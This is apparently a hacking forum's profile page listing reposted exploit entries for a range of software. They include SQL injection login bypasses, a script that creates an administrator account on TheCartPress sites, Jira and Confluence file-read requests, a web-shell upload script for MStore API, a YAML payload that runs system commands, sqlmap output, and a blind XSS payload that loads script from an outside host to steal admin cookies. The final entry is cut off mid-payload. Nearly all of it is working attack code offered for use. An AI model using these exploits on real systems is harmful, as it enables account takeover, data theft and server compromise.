Jump to content

HireHackking

Members

  • Joined

  • Last visited

View Profile Find content

Everything posted by HireHackking

  1. HireHackking

    Young Entrepreneur E-Negosyo System 1.0 - SQL Injection Authentication Bypass

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Young Entrepreneur E-Negosyo System 1.0 - SQL Injection Authentication Bypass # Date: 2021-10-02 # Exploit Author: Jordan Glover # Vendor Homepage: https://www.sourcecodester.com/php/12684/young-entrepreneur-e-negosyo-system.html # Software Link: https://www.sourcecodester.com/download-code?nid=12684&title=Young+Entrepreneur+E-Negosyo+System+in+PHP+Free+Source+Code # Version: v1.0 # Tested on: Windows 10 + XAMPP v3.3.0 Steps-To-Reproduce: Step 1 Go to the admin panel http://localhost/bsenordering/admin/login.php Step 2 – Enter the default admin username janobe and enter password test Step 3 – Click on Sign in and capture the request in the Burp Suite Step 4 – Change the user_email to janobe' or '1'='1 Step 5 – Click forward and now you will be logged in as an admin. POC POST /bsenordering/admin/login.php HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-GB,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 40 Origin: http://localhost Connection: close Referer: http://localhost/bsenordering/admin/login.php Cookie: PHPSESSID=him428198e798r23eagi9mapjk Upgrade-Insecure-Requests: 1 Sec-Fetch-Dest: document Sec-Fetch-Mode: navigate Sec-Fetch-Site: same-origin Sec-Fetch-User: ?1 user_email=janobe' or '1'='1&user_pass=test&btnLogin=
  2. HireHackking

    Wordpress Plugin TheCartPress 1.5.3.6 - Privilege Escalation (Unauthenticated)

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Wordpress Plugin TheCartPress 1.5.3.6 - Privilege Escalation (Unauthenticated) # Google Dork: inurl:/wp-content/plugins/thecartpress/ # Date: 04/10/2021 # Exploit Author: spacehen # Vendor Homepage: https://wordpress.org/plugin/thecartpress # Version: <= 1.5.3.6 # Tested on: Ubuntu 20.04.1 import os.path from os import path import json import requests; import sys def print_banner(): print("TheCartPress <= 1.5.3.6 - Unauthenticated Privilege Escalation") print("Author -> space_hen (www.github.com/spacehen)") def print_usage(): print("Usage: python3 exploit.py [target url]") print("Ex: python3 exploit.py https://example.com") def vuln_check(uri): response = requests.get(uri) raw = response.text if ("User name is required" in raw): return True; else: return False; def main(): print_banner() if(len(sys.argv) != 2): print_usage(); sys.exit(1); base = sys.argv[1] ajax_action = 'tcp_register_and_login_ajax' admin = '/wp-admin/admin-ajax.php'; uri = base + admin + '?action=' + ajax_action ; check = vuln_check(uri); if(check == False): print("(*) Target not vulnerable!"); sys.exit(1) data = { "tcp_new_user_name" : "admin_02", "tcp_new_user_pass" : "admin1234", "tcp_repeat_user_pass" : "admin1234", "tcp_new_user_email" : "test@test.com", "tcp_role" : "administrator" } print("Inserting admin..."); response = requests.post(uri, data=data ) if (response.text == "\"\""): print("Success!") print("Now login at /wp-admin/") else: print(response.text) main();
  3. HireHackking

    Atlassian Jira Server Data Center 8.16.0 - Arbitrary File Read

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Atlassian Jira Server Data Center 8.16.0 - Arbitrary File Read # Date: 2021-10-05 # Exploit Author: Mayank Deshmukh # Vendor Homepage: https://www.atlassian.com/ # Software Link: https://www.atlassian.com/software/jira/download/data-center # Version: versions < 8.5.14, 8.6.0 ≤ version < 8.13.6, 8.14.0 ≤ version < 8.16.1 # Tested on: Kali Linux & Windows 10 # CVE : CVE-2021-26086 POC File #1 - web.xml GET /s/cfx/_/;/WEB-INF/web.xml HTTP/1.1 Host: 127.0.0.1:8080 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Connection: close POC File #2 - seraph-config.xml GET /s/cfx/_/;/WEB-INF/classes/seraph-config.xml HTTP/1.1 Host: 127.0.0.1:8080 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Connection: close POC File #3 - decorators.xml GET /s/cfx/_/;/WEB-INF/decorators.xml HTTP/1.1 Host: 127.0.0.1:8080 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Connection: close POC File #4 - /jira-webapp-dist/pom.properties GET /s/cfx/_/;/META-INF/maven/com.atlassian.jira/jira-webapp-dist/pom.properties HTTP/1.1 Host: 127.0.0.1:8080 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Connection: close POC File #5 - /jira-webapp-dist/pom.xml GET /s/cfx/_/;/META-INF/maven/com.atlassian.jira/jira-webapp-dist/pom.xml HTTP/1.1 Host: 127.0.0.1:8080 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Connection: close POC File #6 - /atlassian-jira-webapp/pom.xml GET /s/cfx/_/;/META-INF/maven/com.atlassian.jira/atlassian-jira-webapp/pom.xml HTTP/1.1 Host: 127.0.0.1:8080 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Connection: close POC File #7 - /atlassian-jira-webapp/pom.properties GET /s/cfx/_/;/META-INF/maven/com.atlassian.jira/atlassian-jira-webapp/pom.properties HTTP/1.1 Host: 127.0.0.1:8080 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Connection: close
  4. HireHackking

    Atlassian Confluence 7.12.2 - Pre-Authorization Arbitrary File Read

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Atlassian Confluence 7.12.2 - Pre-Authorization Arbitrary File Read # Date: 2021-10-05 # Exploit Author: Mayank Deshmukh # Vendor Homepage: https://www.atlassian.com/ # Software Link: https://www.atlassian.com/software/confluence/download-archives # Version: version < 7.4.10 and 7.5.0 ≤ version < 7.12.3 # Tested on: Kali Linux & Windows 10 # CVE : CVE-2021-26085 POC #1 - web.xml GET /s/123cfx/_/;/WEB-INF/web.xml HTTP/1.1 Host: 127.0.0.1:8090 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Connection: close POC #2 - seraph-config.xml GET /s/123cfx/_/;/WEB-INF/classes/seraph-config.xml HTTP/1.1 Host: 127.0.0.1:8090 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Connection: close POC #3 - pom.properties GET /s/123cfx/_/;/META-INF/maven/com.atlassian.confluence/confluence-webapp/pom.properties HTTP/1.1 Host: 127.0.0.1:8090 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Connection: close POC #4 - pom.xml GET /s/123cfx/_/;/META-INF/maven/com.atlassian.confluence/confluence-webapp/pom.xml HTTP/1.1 Host: 127.0.0.1:8090 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Connection: close
  5. HireHackking

    Wordpress Plugin MStore API 2.0.6 - Arbitrary File Upload

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Wordpress Plugin MStore API 2.0.6 - Arbitrary File Upload # Google Dork: inurl:/wp-content/plugins/mstore-api/ # Date: 22/09/2021 # Exploit Author: spacehen # Vendor Homepage: https://wordpress.org/plugins/mstore-api/ # Version: 2.0.6, possibly higher # Tested on: Ubuntu 20.04.1 import os.path from os import path import json import requests; import sys def print_banner(): print("MStore API < 2.0.6 - Arbitrary File Upload") print("Author -> space_hen (www.github.com/spacehen)") def print_usage(): print("Usage: python3 exploit.py [target url] [shell path]") print("Ex: python3 exploit.py https://example.com ./shell.php") def vuln_check(uri): response = requests.post(uri) raw = response.text if ("Key must be" in raw): return True; else: return False; def main(): print_banner() if(len(sys.argv) != 3): print_usage(); sys.exit(1); base = sys.argv[1] file_path = sys.argv[2] rest_url = '/wp-json/api/flutter_woo/config_file' uri = base + rest_url; check = vuln_check(uri); if(check == False): print("(*) Target not vulnerable!"); sys.exit(1) if( path.isfile(file_path) == False): print("(*) Invalid file!") sys.exit(1) files = {'file' : ( "config.json.php", open(file_path), "application/json" )} print("Uploading shell..."); response = requests.post(uri, files=files ) # response should be location of file print(response.text) main();
  6. HireHackking

    Odine Solutions GateKeeper 1.0 - 'trafficCycle' SQL Injection

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Odine Solutions GateKeeper 1.0 - 'trafficCycle' SQL Injection # Date: 05.10.2021 # Exploit Author: Emel Basayar # Vendor: Odine Solutions - odinesolutions.com # Vendor Homepage: https://odinesolutions.com/software/gatekeeper-simbox-antifraud/ # Version: 1.0 # Category: Webapps # Tested on: Ubuntu 18 TLS # Description : The vulnerability allows an attacker to inject sql commands from search section with 'trafficCycle' parameter. # This vulnerability was discovered during the penetration testing and the vulnerability was fixed. ==================================================== # PoC : SQLi : GET /rass/api/v1/trafficCycle/98 HTTP/1.1 Host: 192.168.1.25 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:88.0) Gecko/20100101 Firefox/88.0 Accept: application/json Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Authorization: Bearer xm38HruG-htx0jNuM-l9UBCkoz-G7RigZvx Origin: https://192.168.1.25 Connection: close Referer: https://192.168.1.25 Parameter: #1* (URI) Type: error-based Title: PostgreSQL AND error-based - WHERE or HAVING clause Payload: https://192.168.1.25:443/rass/api/v1/trafficCycle/98' AND 5042=CAST((CHR(113)||CHR(118)||CHR(112)||CHR(118)||CHR(113))||(SELECT (CASE WHEN (5042=5042) THEN 1 ELSE 0 END))::text||(CHR(113)||CHR(118)||CHR(98)||CHR(120)||CHR(113)) AS NUMERIC)-- yrdB Type: stacked queries Title: PostgreSQL > 8.1 stacked queries (comment) Payload: https://192.168.1.25:443/rass/api/v1/trafficCycle/98';SELECT PG_SLEEP(5)-- Type: time-based blind Title: PostgreSQL > 8.1 AND time-based blind Payload: https://192.168.1.25:443/rass/api/v1/trafficCycle/98' AND 9405=(SELECT 9405 FROM PG_SLEEP(5))-- PasC --- web application technology: Nginx back-end DBMS: PostgreSQL ====================================================
  7. HireHackking

    Wordpress Plugin BulletProof Security 5.1 - Sensitive Information Disclosure

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Wordpress Plugin BulletProof Security 5.1 - Sensitive Information Disclosure # Date 04.10.2021 # Exploit Author: Ron Jost (Hacker5preme) # Vendor Homepage: https://forum.ait-pro.com/read-me-first/ # Software Link: https://downloads.wordpress.org/plugin/bulletproof-security.5.1.zip # Version: <= 5.1 # Tested on: Ubuntu 18.04 # CVE: CVE-2021-39327 # CWE: CWE-200 # Documentation: https://github.com/Hacker5preme/Exploits/blob/main/Wordpress/CVE-2021-39327/README.md ''' Description: The BulletProof Security WordPress plugin is vulnerable to sensitive information disclosure due to a file path disclosure in the publicly accessible ~/db_backup_log.txt file which grants attackers the full path of the site, in addition to the path of database backup files. This affects versions up to, and including, 5.1. ''' ''' 'Banner: ''' banner = ''' ______ _______ ____ ___ ____ _ _____ ___ _________ _____ / ___\ \ / / ____| |___ \ / _ \___ \/ | |___ // _ \___ /___ \___ | | | \ \ / /| _| _____ __) | | | |__) | |_____ |_ \ (_) ||_ \ __) | / / | |___ \ V / | |__|_____/ __/| |_| / __/| |_____|__) \__, |__) / __/ / / \____| \_/ |_____| |_____|\___/_____|_| |____/ /_/____/_____/_/ * Sensitive information disclosure @ Author: Ron Jost ''' print(banner) import argparse import requests ''' User-Input: ''' my_parser = argparse.ArgumentParser(description='Wordpress Plugin BulletProof Security - Sensitive information disclosure') my_parser.add_argument('-T', '--IP', type=str) my_parser.add_argument('-P', '--PORT', type=str) my_parser.add_argument('-U', '--PATH', type=str) args = my_parser.parse_args() target_ip = args.IP target_port = args.PORT wp_path = args.PATH print('') print('[*] Starting Exploit:') print('') paths = ["/wp-content/bps-backup/logs/db_backup_log.txt", "/wp-content/plugins/bulletproof-security/admin/htaccess/db_backup_log.txt"] # Exploit for pathadd in paths: x = requests.get("http://" + target_ip + ':' + target_port + '/' + wp_path + pathadd) print(x.text)
  8. HireHackking

    Online DJ Booking Management System 1.0 - 'Multiple' Blind Cross-Site Scripting

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Online DJ Booking Management System 1.0 - 'Multiple' Blind Cross-Site Scripting # Date: 2021-10-06 # Exploit Author: Yash Mahajan # Vendor Homepage: https://phpgurukul.com/ # Software Link: https://phpgurukul.com/online-dj-booking-management-system-using-php-and-mysql/ # Version: V 1.0 # Vulnerable endpoint: http://localhost/odms/book-services.php?bookid=1 # Vulnerable Page URI : http://localhost/odms/admin/view-booking-detail.php?editid=10&&bookingid=989913724 # Tested on Windows 10, XAMPP *Steps to Reproduce:* 1) Navigate http://localhost/odms/book-services.php?bookid=1 2) Enter Blind Xss payload `"><script+src=https://yourxsshunterusername.xss.ht>` in "name=","vaddress=" and "addinfo=" parameters and click on "Book". Request: ======== POST /odms/book-services.php?bookid=1 HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 335 Origin: http://localhost Connection: close Referer: http://localhost/odms/book-services.php?bookid=1 Cookie: PHPSESSID=crj216nrjq751tt0gs4o92undb Upgrade-Insecure-Requests: 1 Sec-Fetch-Dest: document Sec-Fetch-Mode: navigate Sec-Fetch-Site: same-origin Sec-Fetch-User: ?1 name="><script+src=https://biest.xss.ht></script>&email=aa@gg.com&mobnum=9999999999 &edate=2000-10-24&est=6+p.m&eetime=1+p.m&vaddress="><script+src=https://biest.xss.ht></script> &eventtype=Pre+Engagement&addinfo="><script+src=https://biest.xss.ht></script>&submit=Book Now to confirm the vulnerability 3) Login as admin by navigating to http://localhost/odms/admin/login.php. 4) Now as soon as admin visits /view-booking-detail.php to approve the booking, payload fires and attacker will get the details like ip address, cookies of admin 5) Able to steal admin's cookies successfully!! #POC https://ibb.co/Vj3jn2d https://ibb.co/bm9MGdG
  9. HireHackking

    Google SLO-Generator 2.0.0 - Code Execution

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Google SLO-Generator 2.0.0 - Code Execution # Date: 2021-09-28 # Exploit Author: Kiran Ghimire # Software Link: https://github.com/google/slo-generator/releases # Version: <= 2.0.0 # Tested on: Linux # CVE: CVE-2021-22557 ############################################################################## *Introduction*: Is a tool to compute and export Service Level Objectives (SLOs), Error Budgets and Burn Rates, using configurations written in YAML (or JSON) format. ############################################################################## *POC:* 1. pip3 install slo-generator==2.0.0 2. 2. Save the below yaml code in a file as exploit.yaml. !!python/object/apply:os.system ["id;whoami"] 3. Run the below command slo-generator migrate -b exploit.yaml ##############################################################################
  10. HireHackking

    Online Traffic Offense Management System 1.0 - Multiple SQL Injection (Unauthenticated)

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Online Traffic Offense Management System 1.0 - Multiple SQL Injection (Unauthenticated) # Date: 07/10/2021 # Exploit Author: Hubert Wojciechowski # Contact Author: snup.php@gmail.com # Vendor Homepage: https://www.sourcecodester.com # Software Link: https://www.sourcecodester.com/php/14909/online-traffic-offense-management-system-php-free-source-code.html # Version: 1.0 # Testeted on: Windows 10 using XAMPP, Apache/2.4.48 (Win64) OpenSSL/1.1.1l PHP/7.4.23 ### SQL Injection # All requests can be sent by both an authenticated and a non-authenticated user # Example vulnerable pages and parameters: * http://localhost/traffic_offense/classes/Users.php Parameters: - id - firstname - lastname - username * http://localhost/traffic_offense/classes/Login.php Parameters: - username - password * http://localhost/traffic_offense/*/&id=1 [all pages where the id parameter is present] Parameters: - id * http://localhost/traffic_offense/classes/Master.php Parameters: - id - date_created - ticket_no - status - offense_id - fine - code - name ----------------------------------------------------------------------------------------------------------------------- # POC ----------------------------------------------------------------------------------------------------------------------- ## Example 1 # Login request generate sql injection error POST /traffic_offense/classes/Login.php?f=login HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Accept: */* Accept-Language: pl,en-US;q=0.7,en;q=0.3 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Content-Length: 30 Origin: http://localhost Connection: close Referer: http://localhost/traffic_offense/admin/login.php Cookie: PHPSESSID=5vr3fm16tmrncov6j4amftftmi Sec-Fetch-Dest: empty Sec-Fetch-Mode: cors Sec-Fetch-Site: same-origin username=xxxx'&password=xxxx2' ----------------------------------------------------------------------------------------------------------------------- # Response HTTP/1.1 200 OK Date: Wed, 06 Oct 2021 12:31:03 GMT Server: Apache/2.4.48 (Win64) OpenSSL/1.1.1l PHP/7.4.23 X-Powered-By: PHP/7.4.23 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Access-Control-Allow-Origin: * Content-Length: 265 Connection: close Content-Type: text/html; charset=UTF-8 <br /> <b>Notice</b>: Trying to get property 'num_rows' of non-object in <b>C:\xampp\htdocs\traffic_offense\classes\Login.php</b> on line <b>22</b><br /> {"status":"incorrect","last_qry":"SELECT * from users where username = 'xxxx'' and password = md5('xxxx2'') "} ----------------------------------------------------------------------------------------------------------------------- # Exploitable request - login parameter can be any value POST /traffic_offense/classes/Login.php?f=login HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Accept: */* Accept-Language: pl,en-US;q=0.7,en;q=0.3 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Content-Length: 47 Origin: http://localhost Connection: close Referer: http://localhost/traffic_offense/admin/login.php Cookie: PHPSESSID=5vr3fm16tmrncov6j4amftftmi Sec-Fetch-Dest: empty Sec-Fetch-Mode: cors Sec-Fetch-Site: same-origin username=admin&password=xxxx')+or+'1'='1'+and+('1 ----------------------------------------------------------------------------------------------------------------------- # Response HTTP/1.1 200 OK Date: Wed, 06 Oct 2021 12:24:50 GMT Server: Apache/2.4.48 (Win64) OpenSSL/1.1.1l PHP/7.4.23 X-Powered-By: PHP/7.4.23 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Access-Control-Allow-Origin: * Content-Length: 20 Connection: close Content-Type: text/html; charset=UTF-8 {"status":"success"} ----------------------------------------------------------------------------------------------------------------------- Logged as admin account ----------------------------------------------------------------------------------------------------------------------- ## Example 2 # Sql injection detection on the example of pages with the id parameter # Login request generate sql error - add ' next to the id parameter GET /traffic_offense/admin/offenses/view_details.php?id=3' HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Accept: */* Accept-Language: pl,en-US;q=0.7,en;q=0.3 Accept-Encoding: gzip, deflate X-Requested-With: XMLHttpRequest Connection: close Referer: http://localhost/traffic_offense/admin/?page=offenses/manage_record Cookie: PHPSESSID=2nkvkfftfjckjeqfkt6917vnu7 Sec-Fetch-Dest: empty Sec-Fetch-Mode: cors Sec-Fetch-Site: same-origin #Response from database - sql error HTTP/1.1 200 OK Date: Thu, 07 Oct 2021 03:56:37 GMT Server: Apache/2.4.48 (Win64) OpenSSL/1.1.1l PHP/7.4.23 X-Powered-By: PHP/7.4.23 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Access-Control-Allow-Origin: * Content-Length: 7837 Connection: close Content-Type: text/html; charset=UTF-8 You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near ''3''' at line 1 SELECT r.*,d.license_id_no, d.name as driver from `offense_list` r inner join `drivers_list` on r.driver_id = d.id where r.id = '3'' <br /> <b>Notice</b>: Trying to get property 'num_rows' of non-object in <b>C:\xampp\htdocs\traffic_offense\admin\offenses\view_details.php</b> on line <b>10</b><br /> <br /> <b>Notice</b>: Trying to get property 'num_rows' of non-object in <b>C:\xampp\htdocs\traffic_offense\admin\offenses\view_details.php</b> on line <b>16</b> [...] # Request - add '' next to the id parameter GET /traffic_offense/admin/offenses/view_details.php?id=3'' HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Accept: */* Accept-Language: pl,en-US;q=0.7,en;q=0.3 Accept-Encoding: gzip, deflate X-Requested-With: XMLHttpRequest Connection: close Referer: http://localhost/traffic_offense/admin/?page=offenses/manage_record Cookie: PHPSESSID=2nkvkfftfjckjeqfkt6917vnu7 Sec-Fetch-Dest: empty Sec-Fetch-Mode: cors Sec-Fetch-Site: same-origin # Response did not return an error - sql injection confirmed HTTP/1.1 200 OK Date: Thu, 07 Oct 2021 03:58:40 GMT Server: Apache/2.4.48 (Win64) OpenSSL/1.1.1l PHP/7.4.23 X-Powered-By: PHP/7.4.23 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Access-Control-Allow-Origin: * Content-Length: 7214 Connection: close Content-Type: text/html; charset=UTF-8 <div class="container-fluid"> <div class="w-100 d-flex justify-content-end mb-2"> <button class="btn btn-flat btn-sm btn-default bg-lightblue" type="button" id="print"><i class="fa fa-print"></i> Print</button> <button class="btn btn-flat btn-sm btn-default bg-black" data-dismiss="modal"><i class="fa fa-times"></i> Close</button> </div> [...] ----------------------------------------------------------------------------------------------------------------------- ## Example 3 # Using sqlmap on an intercepted request http://localhost/traffic_offense/classes/Master.php POST /traffic_offense/classes/Master.php?f=save_offense_record HTTP/1.1 Origin: http://localhost Content-Length: 1598 Accept-Language: pl,en-US;q=0.7,en;q=0.3 Accept-Encoding: gzip, deflate Sec-Fetch-Site: same-origin Host: localhost:80 Accept: application/json, text/javascript, */*; q=0.01 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Connection: close X-Requested-With: XMLHttpRequest Sec-Fetch-Mode: cors Cookie: PHPSESSID=2nkvkfftfjckjeqfkt6917vnu7 Referer: http://localhost/traffic_offense/admin/?page=offenses/manage_record&id=1 Content-Type: multipart/form-data; boundary=---------------------------7900788429998101281579901385 Sec-Fetch-Dest: empty -----------------------------7900788429998101281579901385 Content-Disposition: form-data; name="id" 1* -----------------------------7900788429998101281579901385 Content-Disposition: form-data; name="date_created" 2021-08-18T15:00* -----------------------------7900788429998101281579901385 Content-Disposition: form-data; name="ticket_no" 12345678 -----------------------------7900788429998101281579901385 Content-Disposition: form-data; name="driver_id" 1 -----------------------------7900788429998101281579901385 Content-Disposition: form-data; name="officer_id" OFC-789456123 -----------------------------7900788429998101281579901385 Content-Disposition: form-data; name="officer_name" George -----------------------------7900788429998101281579901385 Content-Disposition: form-data; name="status" 1* -----------------------------7900788429998101281579901385 Content-Disposition: form-data; name="offense_id[]" 1* -----------------------------7900788429998101281579901385 Content-Disposition: form-data; name="fine[]" 652* -----------------------------7900788429998101281579901385 Content-Disposition: form-data; name="offense_id[]" 3* -----------------------------7900788429998101281579901385 Content-Disposition: form-data; name="fine[]" 1001* -----------------------------7900788429998101281579901385 Content-Disposition: form-data; name="total_amount" 1651 -----------------------------7900788429998101281579901385 Content-Disposition: form-data; name="remarks" Sample -----------------------------7900788429998101281579901385-- # Using the sqlmap utility C:\Users\Hubert\Desktop\sqlmapproject-sqlmap-24e3b6a>sqlmap.py --level=5 --risk=3 --dbms=MySQL -r C:\Users\Hubert\Desktop\0day\sql2 --proxy=http://127.0.0.1:8090 ___ __H__ ___ ___[']_____ ___ ___ {1.5.9.6#dev} |_ -| . [)] | .'| . | |___|_ [']_|_|_|__,| _| |_|V... |_| https://sqlmap.org [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program [*] starting @ 05:52:47 /2021-10-07/ [05:52:47] [INFO] parsing HTTP request from 'C:\Users\Hubert\Desktop\0day\sql2' custom injection marker ('*') found in POST body. Do you want to process it? [Y/n/q] Multipart-like data found in POST body. Do you want to process it? [Y/n/q] [05:52:51] [INFO] testing connection to the target URL [...] --- Parameter: MULTIPART #4* ((custom) POST) Type: boolean-based blind Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause Payload: -----------------------------7900788429998101281579901385 Content-Disposition: form-data; name="id" 1 -----------------------------7900788429998101281579901385 Content-Disposition: form-data; name="date_created" 2021-08-18T15:00 -----------------------------7900788429998101281579901385 Content-Disposition: form-data; name="ticket_no" 12345678 -----------------------------7900788429998101281579901385 Content-Disposition: form-data; name="driver_id" 1 -----------------------------7900788429998101281579901385 Content-Disposition: form-data; name="officer_id" OFC-789456123 -----------------------------7900788429998101281579901385 Content-Disposition: form-data; name="officer_name" George -----------------------------7900788429998101281579901385 Content-Disposition: form-data; name="status" 1 -----------------------------7900788429998101281579901385 Content-Disposition: form-data; name="offense_id[]" 1 -----------------------------7900788429998101281579901385 Content-Disposition: form-data; name="fine[]" 652' RLIKE (SELECT (CASE WHEN (8015=8015) THEN '' ELSE 0x28 END)) AND 'howi'='howi -----------------------------7900788429998101281579901385 Content-Disposition: form-data; name="offense_id[]" 3 -----------------------------7900788429998101281579901385 Content-Disposition: form-data; name="fine[]" 1001 -----------------------------7900788429998101281579901385 Content-Disposition: form-data; name="total_amount" 1651 -----------------------------7900788429998101281579901385 Content-Disposition: form-data; name="remarks" Sample -----------------------------7900788429998101281579901385-- Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR) Payload: -----------------------------7900788429998101281579901385 Content-Disposition: form-data; name="id" 1 